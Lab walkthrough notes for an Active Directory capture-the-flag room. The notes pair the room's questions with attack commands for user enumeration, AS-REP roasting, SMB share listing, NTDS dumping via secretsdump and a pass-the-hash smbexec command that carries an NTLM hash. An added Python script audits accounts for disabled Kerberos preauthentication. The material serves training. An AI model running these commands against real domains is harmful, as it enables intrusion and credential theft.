enum4linux -A 10.10.28.202
What tool will allow us to enumerate port 139/445?
What is the NetBIOS-Domain Name of the machine?
What invalid TLD do people commonly use for their Active Directory Domain?
kerbrute userenum -d spookysec.local --dc 10.10.210.2 userlist.txt
What command within Kerbrute will allow us to enumerate valid usernames?
What notable account is discovered? (These should jump out at you)
What is the other notable account discovered? (These should jump out at you)
AS-REP Roasting attack: for users that have the option "Do not require Kerberos preauthentication" set, the user's hash can be obtained and cracked offline.
echo 10.10.194.183 spookysec.local >> /etc/hosts
GetNPUsers.py spookysec.local/svc-admin -no-pass
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
What mode is the hash?
Now crack the hash with the modified password list provided, what is the user account's password?
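Defender-side check for the AS-REP Roasting condition described above, as an added example that is not part of the original notes: it reads an LDIF-style export of accounts and reports those with the "Do not require Kerberos preauthentication" bit set in userAccountControl. The sample export, account names and domain are constructed; the function names are hypothetical.

```python
# Added example: flag accounts whose userAccountControl allows AS-REP roasting.
# Flag values are the documented userAccountControl bits.
ACCOUNTDISABLE = 0x0002
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sample export (LDIF-style); names and domain are made up.
SAMPLE_LDIF = """\
dn: CN=alice,CN=Users,DC=example,DC=local
sAMAccountName: alice
userAccountControl: 512

dn: CN=svc-report,CN=Users,DC=example,DC=local
sAMAccountName: svc-report
userAccountControl: 4260352

dn: CN=old-svc,CN=Users,DC=example,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Yield one attribute dict per blank-line-separated entry."""
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                entry[key] = value.strip()
        if entry:
            yield entry

def audit_preauth(text):
    """Return accounts with DONT_REQ_PREAUTH set, enabled accounts first."""
    findings = []
    for entry in parse_ldif(text):
        try:
            uac = int(entry.get("userAccountControl", ""), 0)
        except ValueError:
            continue  # entry without a usable userAccountControl value
        if uac & DONT_REQ_PREAUTH:
            findings.append({
                "account": entry.get("sAMAccountName", entry.get("dn", "?")),
                "enabled": not uac & ACCOUNTDISABLE,
                "password_never_expires": bool(uac & DONT_EXPIRE_PASSWORD),
            })
    return sorted(findings, key=lambda f: (not f["enabled"], f["account"]))

if __name__ == "__main__":
    for finding in audit_preauth(SAMPLE_LDIF):
        print(finding)
```

Enabled accounts in the result are the ones to fix first: clear the flag, or if it must stay, give the account a long random password.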
What utility can we use to map remote SMB shares?
Which option will list shares?
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
What is the content of the file?
Decoding the contents of the file, what is the full contents?
secretsdump.py -just-dc email@example.com
What method allowed us to dump NTDS.DIT?
What is the Administrator's NTLM hash?
What method of attack could allow us to authenticate as the user without the password?
Pass the Hash
Using a tool called Evil-WinRM, what option will allow us to use a hash?
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc Administrator@spookysec.local